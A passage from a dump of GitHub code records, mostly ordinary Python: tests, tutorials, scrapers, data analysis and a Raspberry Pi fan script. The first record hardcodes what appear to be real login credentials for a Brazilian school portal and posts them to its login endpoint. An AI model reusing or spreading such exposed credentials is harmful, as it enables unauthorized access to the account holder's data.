bs4 import BeautifulSoup\n\n\npayload = {'email': '29741', 'senha': 'DI3dyM'}\nurl = 'https://sistema.education1.com.br/rds/aluno/autenticar'\nr = requests.post(url, data=payload)\n\nsoup = BeautifulSoup(requests.get(url).content, 'html.parser')\n\nlista_noticias = soup.find_all('table',class_='espaco')\n\nprint(lista_noticias)\n\nprint (r.content)","repo_name":"gabrielserratg/programming","sub_path":"Python-TarefaKeep/login.py","file_name":"login.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"48337074653","text":"import unittest\n\nimport beanmachine.ppl as bm\nimport torch\nimport torch.distributions as dist\n\n\nclass SingleSiteUniformMetropolisHastingsTest(unittest.TestCase):\n class SampleBernoulliModel(object):\n @bm.random_variable\n def foo(self):\n return dist.Beta(torch.tensor(2.0), torch.tensor(2.0))\n\n @bm.random_variable\n def bar(self):\n return dist.Bernoulli(self.foo())\n\n class SampleCategoricalModel(object):\n @bm.random_variable\n def foo(self):\n return dist.Dirichlet(torch.tensor([0.5, 0.5]))\n\n @bm.random_variable\n def bar(self):\n return dist.Categorical(self.foo())\n\n def test_single_site_uniform_mh_with_bernoulli(self):\n model = self.SampleBernoulliModel()\n mh = bm.SingleSiteUniformMetropolisHastings()\n foo_key = model.foo()\n bar_key = model.bar()\n sampler = mh.sampler([foo_key], {bar_key: torch.tensor(0.0)}, num_samples=5)\n for world in sampler:\n self.assertTrue(foo_key in world)\n self.assertTrue(bar_key in world)\n self.assertTrue(foo_key in world.get_variable(bar_key).parents)\n self.assertTrue(bar_key in world.get_variable(foo_key).children)\n\n def test_single_site_uniform_mh_with_categorical(self):\n model = self.SampleCategoricalModel()\n mh = bm.SingleSiteUniformMetropolisHastings()\n foo_key = model.foo()\n bar_key = model.bar()\n sampler = mh.sampler([foo_key], {bar_key: torch.tensor(0.0)}, num_samples=5)\n for world in sampler:\n self.assertTrue(foo_key in world)\n self.assertTrue(bar_key in world)\n self.assertTrue(foo_key in world.get_variable(bar_key).parents)\n self.assertTrue(bar_key in world.get_variable(foo_key).children)\n","repo_name":"facebookresearch/beanmachine","sub_path":"tests/ppl/inference/single_site_uniform_mh_test.py","file_name":"single_site_uniform_mh_test.py","file_ext":"py","file_size_in_byte":1830,"program_lang":"python","lang":"en","doc_type":"code","stars":259,"dataset":"github-code","pt":"77"} +{"seq_id":"37479161457","text":"# python里存入数据只支持存入 字符串 和 二进制\n# json:将Python里的数据(str/list/tuple/dict/int/float/bool/None)等转换成为对应的json字符串\n# pickle:将Python里任意的对象转换成为二进制\n\nimport pickle\n\n# 序列化 dumps: 将Python数据转换成为二进制\n# dump: 将Python数据转换成为二进制,同时保存到指定文件\n# 反序列化 loads: 将二进制加载成为Python数据\n# load: 读取文件,并将文件的成为二进制内容加载成为Python数据\nnames = ['张三', '李四', '杰克', '亨利']\n\n\n# b_names = pickle.dumps(names)\n# # print(b_names)\n#\n# file = open('names.txt', 'wb')\n# file.write(b_names) # 写入的是二进制,不是纯文本\n# file.close()\n#\n# file1 = open('names.txt', 'rb')\n# x = file1.read()\n# y = pickle.loads(x)\n# print(y)\n# file1.close()\n\n# file2 = open('names.txt', 'wb')\n# pickle.dump(names, file2)\n# file2.close()\n#\n# file3 = open('names.txt', 'rb')\n# y = pickle.load(file3)\n# print(y)\n#\nclass Dog(object):\n def __init__(self, name, age):\n self.name = name\n self.age = age\n\n def eat(self):\n print(self.name + '正在吃东西')\n\n\nd = Dog('大黄', 2)\npickle.dump(d, open('dog.txt', 'wb'))\nd1 = pickle.load(open('dog.txt', 'rb'))\nprint(d1.name, d1.age)\nd1.eat()\n\n\"\"\"\npickle 和 json 区别?什么情况下使用json,什么情况下使用pickle?\n\n1.pickle 用来将数据原封不动的转换成为二进制,但是这个二进制只能在Python 里识别;\n2.json 只能保存一部分信息,作用是用来在不同的平台里传递数据,json里存储的数据都是基本的数据类型\n\"\"\"\n","repo_name":"Frecy16/learning","sub_path":"py_study/fileOpera/10、pickle的使用.py","file_name":"10、pickle的使用.py","file_ext":"py","file_size_in_byte":1661,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6056867843","text":"print('Please enter two number!')\r\nnum1=input('\\nenter first integer:')\r\nnum2=input('\\nenter second 
integer:')\r\nnum1=int(num1)\r\nnum2=int(num2)\r\nif num1 > num2:\r\n    print('\\nfirst is greater than second')\r\nelse:\r\n    print('\\nfirst is not greater than second')\r\nprint('\\nAll done!')\r\n\r\n\r\n","repo_name":"cyhr-0621/python-self-study","sub_path":"选择语句/if-else的双分支选择.py","file_name":"if-else的双分支选择.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"74449595447","text":"from selenium import webdriver\nfrom selenium.webdriver.common.by import By\nimport time\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nimport math\nimport pyperclip as pc\n\n#решение задачи\ndef calc(): #решалка задания\n    driver.find_element(By.CLASS_NAME, 'form-control').send_keys(\n        str(math.log(abs(12 * math.sin(int(\n            driver.find_element(By.ID, 'input_value').text))))))\n    driver.find_element(By.ID, \"solve\").click()\n    stepikCalc()\n\ndef stepikCalc():\n    pc.copy(driver.switch_to.alert.text.split(': ')[-1]) # сохранить в буфер калькуляцию\n\ndef returnTextInElement(BySearch, element, text, time):\n    if BySearch == 'id' or 'ID': #ждем когда текст будет 100 в прайсе\n        return WebDriverWait(driver, time).until(EC.text_to_be_present_in_element((By.ID, element), text))\n\ntry:\n    link = \"http://suninjuly.github.io/explicit_wait2.html\"\n    driver = webdriver.Chrome('E:\\\\Selenium\\\\chromedriver.exe')\n    driver.implicitly_wait(5)\n    driver.get(link)\n\n    returnTextInElement('ID', 'price', '100', 15)\n    driver.find_element(By.ID, 'book').click()\n    calc()\n\nfinally:\n    time.sleep(5)\n    driver.quit()","repo_name":"PyZNik/stepik_auto_tests_course","sub_path":"2,4-8.py","file_name":"2,4-8.py","file_ext":"py","file_size_in_byte":1332,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18726512289","text":"import csv\nimport multiprocessing\nimport os\nfrom datetime import datetime\nimport pytz\n\nimport pandas as pd\n\nimport requests\nfrom xml.etree import ElementTree\n\n\nclass Vacancy:\n    \"\"\"Класс для представления вакансии\n\n    Attributes:\n        name (str): Название вакансии\n        salary_currency (str): Валюта зарплаты\n        date (datetime): Дата публикации\n    \"\"\"\n    currency_to_rub = {\n        \"AZN\": 35.68, \"BYR\": 23.91, \"EUR\": 59.90, \"GEL\": 21.74, \"KGS\": 0.76,\n        \"KZT\": 0.13, \"RUR\": 1, \"UAH\": 1.64, \"USD\": 60.66, \"UZS\": 0.0055,\n    }\n\n    def __init__(self, vacancy):\n        \"\"\"Конструктор объекта вакансий\n\n        :param dict vacancy: Словарь вакансии\n        \"\"\"\n        self.name = vacancy['name']\n        self.salary_currency = vacancy['salary_currency']\n        self.date = datetime.strptime(vacancy['published_at'], '%Y-%m-%dT%H:%M:%S%z')\n\n\nclass StatsContainer:\n    \"\"\"Класс для объединения объектов статистики\n\n    Attributes:\n        stats (list): Объекты статистики\n    \"\"\"\n\n    def __init__(self):\n        self.stats = []\n        self.old_date = datetime(2022, 12, 22, tzinfo=pytz.UTC)\n        self.new_date = datetime(1970, 1, 1, tzinfo=pytz.UTC)\n\n    def write(self, stat_list):\n        self.stats = stat_list\n\n        for s in self.stats:\n            if s.old_date < self.old_date: self.old_date = s.old_date\n            if s.new_date > self.new_date: self.new_date = s.new_date\n\n    def get_count(self):\n        temp = {}\n        for s in self.stats:\n            d = s.get_count()\n            for k, v in d.items():\n                if k in temp.keys(): temp[k] += v\n                else: temp[k] = v\n        temp = dict(sorted(temp.items(), key=lambda item: item[1], reverse=True))\n        return {k: v for k, v in temp.items() if v > 5000 and k != 
'RUR'}\n\n def print_statistics(self, output='date_dinamics.csv'):\n currencies = self.get_count().keys()\n date_list = pd.date_range(self.old_date, self.new_date, freq='M')\n info = pd.DataFrame({\n 'date': date_list.strftime('%Y-%m').tolist(),\n })\n for v in currencies:\n info[v] = 0\n for i, date in enumerate(date_list.strftime('%d/%m/%Y').tolist()):\n response = requests.get('http://www.cbr.ru/scripts/XML_daily.asp?date_req={}'.format(date))\n root = ElementTree.fromstring(response.content)\n for v in currencies:\n for item in range(len(root)):\n if root[item][1].text == v:\n info.at[i, v] = float(root[item][4].text.replace(\",\", \".\")) / float(\n root[item][2].text.replace(\",\", \".\"))\n break\n if root[item][1].text == 'BYN':\n info.at[i, 'BYR'] = float(root[item][4].text.replace(\",\", \".\")) / float(\n root[item][2].text.replace(\",\", \".\"))\n info.to_csv(output)\n\n\nclass Statistic:\n \"\"\"Класс для представления статистики\n\n Attributes:\n salary_currency (dict): Количество каждой вадюты\n \"\"\"\n def __init__(self):\n \"\"\"Конструктор класса статистики\"\"\"\n self.salary_currency = {}\n self.old_date = datetime(2022, 12, 22, tzinfo=pytz.UTC)\n self.new_date = datetime(1970, 1, 1, tzinfo=pytz.UTC)\n\n def write(self, vacancy):\n \"\"\"Заполение статистики\n\n :param Vacancy vacancy: Вакансия\n \"\"\"\n if vacancy.salary_currency in self.salary_currency:\n self.salary_currency[vacancy.salary_currency] += 1\n else:\n self.salary_currency[vacancy.salary_currency] = 1\n\n if vacancy.date < self.old_date: self.old_date = vacancy.date\n if vacancy.date > self.new_date: self.new_date = vacancy.date\n\n def get_count(self):\n return dict(sorted(self.salary_currency.items(), key=lambda item: item[1], reverse=True))\n\n\nclass DataSet:\n \"\"\"Дата-сет для работы с таблицей\n Attributes:\n file_name (str): Название файла\n \"\"\"\n def __init__(self, file_name):\n \"\"\"Конструктор класса DataSet\n\n :param str file_name: Название файла\n \"\"\"\n self.file_name = file_name\n\n def csv_reader(self):\n \"\"\"Читает CSV файл\"\"\"\n with open(self.file_name, mode='r', encoding='utf-8-sig') as file:\n reader = csv.reader(file)\n header = next(reader)\n header_length = len(header)\n for row in reader:\n if row[3] != '' and len(row) == header_length:\n yield dict(zip(header, row))\n\n def get_statistic(self):\n \"\"\"Получить статистические данные\n\n :return Statistics: Статистика\n \"\"\"\n statistics = Statistic()\n\n for vacancy in self.csv_reader():\n statistics.write(Vacancy(vacancy))\n\n return statistics\n\n\nclass InputConnect:\n \"\"\"Начальная точка программы. 
Объединяет всю логику программы\n\n Attributes:\n file_name (str): Название файла\n \"\"\"\n def __init__(self, fn=None):\n \"\"\"\n Начало работы программы\n \"\"\"\n self.file_name = fn\n if fn is None:\n self.file_name = input('Введите название файла: ')\n\n files = [self.file_name + \"/\" + f for f in os.listdir(self.file_name)]\n\n self.container = StatsContainer()\n pool = multiprocessing.Pool(multiprocessing.cpu_count())\n pool.map_async(self.generate_statistic, files, callback=self.on_end_pool)\n pool.close()\n pool.join()\n\n def generate_statistic(self, filename):\n \"\"\"Таск для многопотока\n\n :param filename: Название файла\n :return: Статистика одного года\n \"\"\"\n dataset = DataSet(filename)\n return dataset.get_statistic()\n\n def on_end_pool(self, response):\n \"\"\"Коллбэк по окончанию работы\n\n :param response: ответ\n :return:\n \"\"\"\n self.container.write(response)\n print(self.container.get_count())\n self.container.print_statistics()\n\n\nif __name__ == '__main__': InputConnect(\"chunks2\")\n","repo_name":"WheatleyHDD/tp-project","sub_path":"currency_stats.py","file_name":"currency_stats.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39115560970","text":"from odoo import fields, models\n\n\nclass MailMessage(models.Model):\n _inherit = 'mail.message'\n\n message_body = fields.Html()\n stage = fields.Selection([('stage_01', 'Stage 01'), ('stage_02', 'Stage 02')], default='stage_01')\n\n def create_message(self, data):\n message = \"\"\n if data:\n message = \"• %s: %s → %s\" % (\n data.get('changed_field', ''), data.get('old_value', ''), data.get('new_value', ''))\n return message\n\n def message_format(self, format_reply=True):\n for rec in self:\n res_ = super(MailMessage, rec).message_format()\n if res_ and res_[0].get('tracking_value_ids'):\n if res_[0]['model'] in ['sale.operation', 'sale.operation.child']:\n rec.message_body = rec.create_message(res_[0]['tracking_value_ids'][0])\n return super(MailMessage, self).message_format(format_reply)\n\n def create(self, vals):\n if isinstance(vals, dict) and vals.get('model') in ['sale.operation', 'sale.operation.child']:\n vals.update({'stage': self._context.get('stage', 'stage_01')})\n if isinstance(vals, list):\n for val in vals:\n if val.get('model') in ['sale.operation', 'sale.operation.child']:\n val.update({'stage': self._context.get('stage', 'stage_01')})\n return super(MailMessage, self).create(vals)\n","repo_name":"Choreograph-Lille/OdooConex","sub_path":"maas-addons/maas_base/models/mail_message.py","file_name":"mail_message.py","file_ext":"py","file_size_in_byte":1413,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29323869629","text":"def reqPhoneNumber():\n while True:\n phoneNumber = input(\"Ingresa el numero de teléfono: \")\n try:\n if len(phoneNumber) == 8:\n return int(phoneNumber)\n else:\n print(\"Debes ingresar un numero de 8 dígitos. \\nInténtalo de unuevo \\n\")\n except ValueError:\n print(\"Debes ingresar un número entero. \\nInténtalo de unuevo \\n\")\n\ndef reqHourNumber():\n while True:\n hourNumber = input(\"Ingresa la hora de la llamada: \")\n try:\n hourNumber = int(hourNumber)\n if hourNumber >= 0 and hourNumber <= 23 :\n return int(hourNumber)\n else:\n print(\"Debes ingresar un numero entre 0 y 24. \\nInténtalo de unuevo \\n\")\n except ValueError:\n print(\"Debes ingresar un número entero entre 0 y 24. 
\\nInténtalo de unuevo \\n\")\n\ndef getLastNumber(number, qtynumber):\n return number % (10**qtynumber)\n\ndef getFirstNumber(number, qtynumber):\n return int(number / (10**(int(len(str(number)))-qtynumber)))\n\nphoneNumber = reqPhoneNumber()\nhourNumber = reqHourNumber()\n\nif hourNumber >=0 and hourNumber <= 7:\n print(\"Resultado: CONTESTAR\")\nelif hourNumber < 14:\n if getLastNumber(phoneNumber,3) == 909:\n print(getLastNumber(phoneNumber,3))\n print(\"Resultado: CONTESTAR\")\n else:\n print(getLastNumber(phoneNumber,3))\n print(\"Resultado: NO CONTESTAR\")\nelif hourNumber >=17 and hourNumber <= 19: \n if getFirstNumber(phoneNumber,3) == 877:\n print(getFirstNumber(phoneNumber,3))\n print(\"Resultado: NO CONTESTAR\")\n else:\n print(getFirstNumber(phoneNumber,3))\n print(\"Resultado: CONTESTAR\")\nelse:\n print(\"Resultado: NO CONTESTAR\")","repo_name":"pabloschwarzenberg/grader","sub_path":"hito1_ej2/hito1_ej2_d4198d0f164e6ab66bad06de0bcb726a.py","file_name":"hito1_ej2_d4198d0f164e6ab66bad06de0bcb726a.py","file_ext":"py","file_size_in_byte":1760,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"21599809005","text":"from heapq import heappush, heappop\nfrom bisect import bisect_left\nfrom collections import deque\n\nt = int(input())\nfor _ in range(t):\n n,m = [int(i) for i in input().split()]\n A = [int(i) for i in input().split()]\n A = [(A[i], -i) for i in range(n*m)]\n A.sort(reverse=True)\n print(A)\n que = deque()\n a = 0\n inconv = 0\n nxt = []\n for i in range(n):\n order = []\n pe = -1\n for j in range(m):\n if not que:\n print(nxt)\n if nxt:\n for k in range(len(nxt)-1,-1,-1):\n que.appendleft(nxt[k])\n nxt = nxt[:len(nxt)-(m-j)-1]\n else:\n ev = A[a][0]\n while a < len(A) and A[a][0] == ev:\n que.append((-A[a][1], A[a][0]))\n a += 1\n while len(que) > m-j:\n nxt.append(que.popleft())\n index,eye = que.popleft()\n order.append(index)\n print(order)\n tmp = []\n for i in range(m-1,-1,-1):\n ind = bisect_left(tmp, order[i])\n inconv += ind\n tmp.insert(ind, order[i])\n print(inconv)","repo_name":"Programmerryoki/Competitive-Programming","sub_path":"CodeForces/Codeforces Global Round 16/D1.py","file_name":"D1.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"70788879930","text":"import streamlit as st\r\nimport folium\r\nfrom streamlit_folium import st_folium\r\nfrom functions.login import get_loginform\r\nfrom functions.pagesetup import set_title, set_page_overview\r\nfrom functions.supabase import get_data_sensors\r\nfrom folium import Popup # Import the Popup class\r\nimport pandas as pd\r\n\r\nst.set_page_config(layout=\"wide\", initial_sidebar_state=\"collapsed\")\r\n\r\nif 'authenticated' not in st.session_state:\r\n get_loginform()\r\nelif not st.session_state.authenticated:\r\n get_loginform()\r\nelse:\r\n set_title(\"FEOC\", \"Analytics Panel\")\r\n set_page_overview(\"Overview\", \"View **real-time**, **operational**, and **financial** dashboards.\")\r\n \r\n container1 = st.container()\r\n with container1:\r\n \r\n dfSensors = get_data_sensors()\r\n US_center = (39.8283, -98.5795)\r\n map = folium.Map(location=US_center, zoom_start=4)\r\n for _, sensor in dfSensors.iterrows():\r\n location = sensor['latitude'], sensor['longitude']\r\n folium.Marker(\r\n location=location,\r\n popup=Popup(\"Sensor Data\", parse_html=False),\r\n tooltip=f\"Sensor at {location}\",\r\n ).add_to(map)\r\n \r\n 
st.header(\"Live read Sensor data\")\r\n out = st_folium(map, width=1000) # Capture the output into 'out'\r\n st.write(\"Popup:\", out[\"last_object_clicked_popup\"])\r\n st.write(\"Tooltip:\", out[\"last_object_clicked_tooltip\"])","repo_name":"flowgeniusmz/FEOC-Sequestration","sub_path":"pages/3_Analytics_Panel.py","file_name":"3_Analytics_Panel.py","file_ext":"py","file_size_in_byte":1442,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"10447504676","text":"#!/usr/bin/env python3\n# Author: Andreas Spiess\nimport os\nimport time\nfrom time import sleep\nimport signal\nimport sys\nimport RPi.GPIO as GPIO\n\n\nfanPin = 17 # The pin ID, edit here to change it\nbatterySensPin = 18\n\nmaxTMP = 50 # The maximum temperature in Celsius after which we trigger the fan\n\ndef Shutdown(): \n fanOFF()\n os.system(\"sudo shutdown -h 1\")\n sleep(100)\ndef setup():\n GPIO.setmode(GPIO.BCM)\n GPIO.setup(fanPin, GPIO.OUT)\n GPIO.setup(batterySensPin, GPIO.IN, pull_up_down = GPIO.PUD_DOWN)\n #GPIO.add_event_detect(batterySensPin, GPIO.RISING, callback = Shutdown, bouncetime = 2000)\n GPIO.setwarnings(False)\n fanOFF()\n return()\ndef getCPUtemperature():\n res = os.popen('vcgencmd measure_temp').readline()\n temp =(res.replace(\"temp=\",\"\").replace(\"'C\\n\",\"\"))\n #print(\"temp is {0}\".format(temp)) #Uncomment here for testing\n return temp\ndef fanON():\n setPin(True)\n return()\ndef fanOFF():\n setPin(False)\n return()\ndef handleFan():\n CPU_temp = float(getCPUtemperature())\n if CPU_temp>maxTMP:\n fanON()\n #print(\"fan on\")\n if CPU_temp 4]\n#Aggregate, get the mean of the Aberdeen data for all prices.\n##WeekdY\nMeanWkData=WkData[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkData.head(12)\n##Weekend\nMeanWkendData=WkendData[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkendData.head(12)\n\n#Create subsets of data for every month\n#Weekday by month\njanmeanwkda=MeanWkData.loc[1:1]\nfebmeanwkda=MeanWkData.loc[2:2]\nmarmeanwkda=MeanWkData.loc[3:3]\naprmeanwkda=MeanWkData.loc[4:4]\nmaymeanwkda=MeanWkData.loc[5:5]\njunmeanwkda=MeanWkData.loc[6:6]\njulmeanwkda=MeanWkData.loc[7:7]\naugmeanwkda=MeanWkData.loc[8:8]\nsepmeanwkda=MeanWkData.loc[9:9]\noctmeanwkda=MeanWkData.loc[10:10]\nnovmeanwkda=MeanWkData.loc[11:11]\ndecmeanwkda=MeanWkData.loc[12:12]\n#Weekend by month\njanmeanwkndda=MeanWkendData.loc[1:1]\nfebmeanwkndda=MeanWkendData.loc[2:2]\nmarmeanwkndda=MeanWkendData.loc[3:3]\naprmeanwkndda=MeanWkendData.loc[4:4]\nmaymeanwkndda=MeanWkendData.loc[5:5]\njunmeanwkndda=MeanWkendData.loc[6:6]\njulmeanwkndda=MeanWkendData.loc[7:7]\naugmeanwkndda=MeanWkendData.loc[8:8]\nsepmeanwkndda=MeanWkendData.loc[9:9]\noctmeanwkndda=MeanWkendData.loc[10:10]\nnovmeanwkndda=MeanWkendData.loc[11:11]\ndecmeanwkndda=MeanWkendData.loc[12:12]\n#Export to 
csv\n##Weekday\njanmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/janmeanwkda.csv')\nfebmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/febmeanwkda.csv')\nmarmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/marmeanwkda.csv')\naprmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/aprmeanwkda.csv')\nmaymeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/maymeanwkda.csv')\njunmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/junmeanwkda.csv')\njulmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/julmeanwkda.csv')\naugmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/augmeanwkda.csv')\nsepmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/sepmeanwkda.csv')\noctmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/octmeanwkda.csv')\nnovmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/novmeanwkda.csv')\ndecmeanwkda.to_csv('/Users/Work/Desktop/NWE/Output/decmeanwkda.csv')\n##weekend\njanmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/janmeanwkndda.csv')\nfebmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/febmeanwkndda.csv')\nmarmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/marmeanwkndda.csv')\naprmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/aprmeanwkndda.csv')\nmaymeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/maymeanwkndda.csv')\njunmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/junmeanwkndda.csv')\njulmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/julmeanwkndda.csv')\naugmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/augmeanwkndda.csv')\nsepmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/sepmeanwkndda.csv')\noctmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/octmeanwkndda.csv')\nnovmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/novmeanwkndda.csv')\ndecmeanwkndda.to_csv('/Users/Work/Desktop/NWE/Output/decmeanwkndda.csv')\n\n#**** Here the RT LMP data is brought in to create the probabilities for spikes***#\n#Read in data\nFullDataRT=pd.read_csv('/Users/Work/Desktop/NWE/Raw_Data/RT_NWE_FULL.csv')\nFullDataRT.info()\nFullDataRT.head()\n#Get month and hour columns\nFullDataRT['textdate']=FullDataRT['Interval'].astype(str)\nFullDataRT['textdate']=FullDataRT['textdate'].str.strip()\nFullDataRT['Date']=pd.to_datetime(FullDataRT['textdate'], format='%d%b%y:%H:%M', errors='coerce')\nFullDataRT['Hour']= FullDataRT.Date.apply(lambda x : x.hour)\nFullDataRT['Month']= FullDataRT.Date.apply(lambda x : x.month)\nFullDataRT['Day']= FullDataRT.Date.apply(lambda x : x.day)\nFullDataRT['Weekday'] = FullDataRT['Date'].apply(lambda x: x.weekday())\n#Weekday data\nWkDataRT=FullDataRT[FullDataRT.Weekday < 5]\n#WeekEnd\nWkendDataRT=FullDataRT[FullDataRT.Weekday > 4]\n#Aggregate, get the mean of the Aberdeen data for all prices.\n##WeekdY\nMeanWkDataRT=WkDataRT[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkDataRT.head(12)\n##Weekend\nMeanWkendDataRT=WkendDataRT[['Month','Hour','LMP','RegUP','RegDN','Spin','Supp']].groupby(['Month','Hour']).mean()\nMeanWkendDataRT.head(12)\n#***********************************************************#\n\n#Spike 
frequency\n##Weekday\nWksubRT=WkDataRT[['Month','Hour','LMP']]\nWksubRT['SpikeFlag']=0\nWksubRT.ix[WksubRT.LMP>100,'SpikeFlag']=1\nWkSpikesRT=WksubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).sum()\n##Weekday\nWkendsubRT=WkendDataRT[['Month','Hour','LMP']]\nWkendsubRT['SpikeFlag']=0\nWkendsubRT.ix[WkendsubRT.LMP>100,'SpikeFlag']=1\nWkendSpikesRT=WkendsubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).sum()\n\nWkSpikesRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikes.csv')\nWkendSpikesRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikes.csv')\n\n#Spike mean by day month (probabilty)\n##Weekday\nWkSpikesmeanRT=WksubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).mean()\n#Weekend\nWkendSpikesmeanRT=WkendsubRT[['SpikeFlag','Month','Hour']].groupby(['Month','Hour']).mean()\n\nWkSpikesmeanRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikesmean.csv')\nWkendSpikesmeanRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikesmean.csv')\n#Average Spike Price\nWkSpikePriceRT=WksubRT.where(WksubRT.SpikeFlag==1).groupby(['Month','Hour']).mean()\nWkendSpikePriceRT=WkendsubRT.where(WkendsubRT.SpikeFlag==1).groupby(['Month','Hour']).mean()\n\nWkSpikePriceRT.to_csv('/Users/Work/Desktop/NWE/Output/WkSpikeprice.csv')\nWkendSpikePriceRT.to_csv('/Users/Work/Desktop/NWE/Output/WkendSpikeprice.csv')\n\n\n#************After this point we have data set with average DA Prices and RT Spike expected Prices*******\nMeanWkData['ExpectedSpikeWk']=WkSpikesmeanRT.SpikeFlag*WkSpikePriceRT.LMP\nMeanWkendData['ExpectedSpikeWkend']=WkendSpikesmeanRT.SpikeFlag*WkendSpikePriceRT.LMP\n\n#**************** returns data set that specifies what to sell*******\n\n#Set Generation Characteristics Parameters\nFullGenHR=8.9 #Mbtu/MW\nMidGenHR=9.5 #Mbtu/MW\nMinGenHR=10.5 #Mbtu/MW\nFullGenCap=18.4 #MW\nMidGenCap=11.20 #MW\nMinGenCap=4.0 #MW\nVariableOM=7.0 #$/MWh\nOutage=.05 # will be %\nStrikePriceFull=33.70 #$/MWh\nStrikePriceMid=33.50 #$/MWh\nGasPrice=3 #$\nPowerOn= 28 #$\nPowerOff= 18 #$\n\n#Weekday Gros Margin Columns\nMeanWkData['GMregulation']= MeanWkData.RegUP*(FullGenHR-MinGenHR)+MidGenCap*(PowerOn-PowerOff)/2-(StrikePriceMid-MidGenCap)\nMeanWkData['GMSpin']=(FullGenCap-MinGenCap)*MeanWkData.Spin-(MinGenCap*(MinGenHR*GasPrice-VariableOM))\nMeanWkData['GMnonSpin']=FullGenCap*MeanWkData.Supp\n\n#Weekend Gross Margin Columns \nMeanWkendData['GMregulation']= MeanWkendData.RegUP*(FullGenHR-MinGenHR)+MidGenCap*(PowerOn-PowerOff)/2-(StrikePriceMid-MidGenCap)\nMeanWkendData['GMSpin']=(FullGenCap-MinGenCap)*MeanWkendData.Spin-(MinGenCap*(MinGenHR*GasPrice-VariableOM))\nMeanWkendData['GMnonSpin']=FullGenCap*MeanWkendData.Supp\n\n#Subset to Only GM prices and spike then select max column name \nGMWkData=MeanWkData[['GMregulation','GMSpin','GMnonSpin','ExpectedSpikeWk']]\nGMWkendData=MeanWkendData[['GMregulation','GMSpin','GMnonSpin','ExpectedSpikeWkend']]\n\nGMWkData['ExpectedSpikeWk']=GMWkData['ExpectedSpikeWk'].fillna(value=0)\nGMWkendData['ExpectedSpikeWkend']=GMWkendData['ExpectedSpikeWkend'].fillna(value=0)\n\nGMWkData['ScaledSpike']=GMWkData['ExpectedSpikeWk']*12\nGMWkendData['ScaledSpike']=GMWkendData['ExpectedSpikeWkend']*12\n\nGMWkData['Rule']=GMWkData.idxmax(axis=1)\nGMWkendData['Rule']=GMWkendData.idxmax(axis=1)\n#Create final 
CSV\nGMWkData.to_csv('/Users/Work/Desktop/NWE/Output/WeekRules.csv')\nGMWkendData.to_csv('/Users/Work/Desktop/NWE/Output/WeekendRules.csv')","repo_name":"skadaman/Analytics","sub_path":"NWEmodelrules.py","file_name":"NWEmodelrules.py","file_ext":"py","file_size_in_byte":8889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"12731188237","text":"from util import joinBytes, splitBits\nfrom typing import List\n\n\nBIT_MASK: int = (1 << 32) - 1\n\n\n# The first 32 bits of the fractional parts of the cube roots of the first 4 primes.\nK: List[int] = [0x5a827999, 0x6ed9eba1, 0x8f1bbcdc, 0xca62c1d6]\n\n\ndef shaPad(message: List[int], byteSize: int) -> List[int]:\n bitSize: int = byteSize * 8\n outLength: int = (len(message) // bitSize + 1) * bitSize\n out: List[int] = [0] * outLength\n\n # Copy first 'n' values of 'message' to 'out'.\n i: int = 0\n while i < len(message):\n out[i] = message[i]\n i += 1\n\n # Append a single bit to the end of 'out'.\n out[i] = 0x80\n\n byteMask: int = (1 << 8) - 1\n inLength: int = len(message) * 8\n\n # Append a 'message' length to the end of 'out' in bits.\n i: int = len(out)\n while inLength:\n i -= 1\n out[i] = inLength & byteMask\n inLength >>= 8\n\n return out\n\n\ndef 